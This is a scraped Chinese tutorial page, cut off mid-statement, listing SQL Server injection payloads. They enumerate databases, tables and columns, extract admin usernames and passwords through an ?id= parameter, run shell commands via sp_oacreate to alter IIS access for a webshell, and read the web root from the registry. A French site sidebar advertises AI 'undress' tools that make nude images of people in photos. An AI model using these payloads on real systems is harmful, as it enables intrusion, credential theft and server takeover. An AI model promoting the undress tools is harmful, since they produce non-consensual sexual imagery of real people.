常用SQL注射语句解析(2)_MySQL
bitsCN.com
w "默认Web站点"
-v "e","e:/"'--
访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
@o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a
w3svc/1/ROOT/e +browse'
爆库 特殊技巧::%5c='/' 或者把/和/ 修改%5提交
如何得到SQLSERVER某个数据库中所有表的表名?
--------------------------------------------------------------------------------
用户表:
select name from sysobjects where xtype = 'U';
系统表:
select name from sysobjects where xtype = 'S';
所有表:
select name from sysobjects where xtype = 'S' or xtype = 'U';
--------------------------------------------------------------------------------
and 0(select top 1 paths from newtable)--
得到库名(从1到5都是系统的id,6以上才可以判断)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0(select count(*) from master.dbo.sysdatabases where name>1 and
dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表
假设为 admin
and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name
not in ('Admin')) 来得到其他的表。
and 0(select count(*) from bbs.dbo.sysobjects where xtype='U' and
name='admin'
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569)
得到一个admin的一个字段,假设为 user_id
and 0(select top 1 name from bbs.dbo.syscolumns where id=18779569 and
name not in
('id',...)) 来暴出其他的字段
and 01) 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
and 0(select count(*) from master.dbo.sysdatabases where name>1 and
dbid=6)
and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
and 0(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name
not in('Address'))
and 0(select count(*) from bbs.dbo.sysobjects where xtype='U' and
name='admin' and uid>(str(id))) 判断id值
and 0(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union,access也好用)
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare
@test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/',
@value_name='/', values=@test OUTPUT insert into p
bitsCN.com
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
AI Hentai Generator
Générez AI Hentai gratuitement.
Article chaud
Outils chauds
Bloc-notes++7.3.1
Éditeur de code facile à utiliser et gratuit
SublimeText3 version chinoise
Version chinoise, très simple à utiliser
Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP
Dreamweaver CS6
Outils de développement Web visuel
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
Sujets chauds
Réduisez l'utilisation de la mémoire MySQL dans Docker
Mar 04, 2025 pm 03:52 PM
Cet article explore l'optimisation de l'utilisation de la mémoire MySQL dans Docker. Il traite des techniques de surveillance (statistiques Docker, du schéma de performance, des outils externes) et des stratégies de configuration. Il s'agit notamment des limites de mémoire Docker, de l'échange et des CGROUP, à côté
Comment résoudre le problème de MySQL ne peut pas ouvrir la bibliothèque partagée
Mar 04, 2025 pm 04:01 PM
Cet article aborde l'erreur "Implom Open Open Wibrary" de MySQL. Le problème découle de l'incapacité de MySQL à localiser les bibliothèques partagées nécessaires (fichiers .so / .dll). Les solutions impliquent la vérification de l'installation de la bibliothèque via le package du système m
Comment modifier une table dans MySQL en utilisant l'instruction ALTER TABLE?
Mar 19, 2025 pm 03:51 PM
L'article discute de l'utilisation de l'instruction ALTER TABLE de MySQL pour modifier les tables, notamment en ajoutant / abandon les colonnes, en renommant des tables / colonnes et en modifiant les types de données de colonne.
Exécutez MySQL dans Linux (avec / sans conteneur Podman avec phpmyadmin)
Mar 04, 2025 pm 03:54 PM
Cet article compare l'installation de MySQL sur Linux directement par rapport à l'utilisation de conteneurs Podman, avec / sans phpmyadmin. Il détaille les étapes d'installation pour chaque méthode, mettant l'accent sur les avantages de Podman isolément, portabilité et reproductibilité, mais aussi
Qu'est-ce que Sqlite? Aperçu complet
Mar 04, 2025 pm 03:55 PM
Cet article fournit un aperçu complet de SQLite, une base de données relationnelle autonome et sans serveur. Il détaille les avantages de SQLite (simplicité, portabilité, facilité d'utilisation) et les inconvénients (limitations de concurrence, défis d'évolutivité). C
Comment configurer le cryptage SSL / TLS pour les connexions MySQL?
Mar 18, 2025 pm 12:01 PM
L'article discute de la configuration du cryptage SSL / TLS pour MySQL, y compris la génération et la vérification de certificat. Le problème principal est d'utiliser les implications de sécurité des certificats auto-signés. [Compte de caractère: 159]
Exécuter plusieurs versions MySQL sur macOS: un guide étape par étape
Mar 04, 2025 pm 03:49 PM
Ce guide démontre l'installation et la gestion de plusieurs versions MySQL sur MacOS à l'aide de Homebrew. Il met l'accent sur l'utilisation de Homebrew pour isoler les installations, empêchant les conflits. L'article détaille l'installation, les services de démarrage / d'arrêt et le meilleur PRA
Quels sont les outils de GUI MySQL populaires (par exemple, MySQL Workbench, PhpMyAdmin)?
Mar 21, 2025 pm 06:28 PM
L'article traite des outils de GUI MySQL populaires comme MySQL Workbench et PhpMyAdmin, en comparant leurs fonctionnalités et leur pertinence pour les débutants et les utilisateurs avancés. [159 caractères]
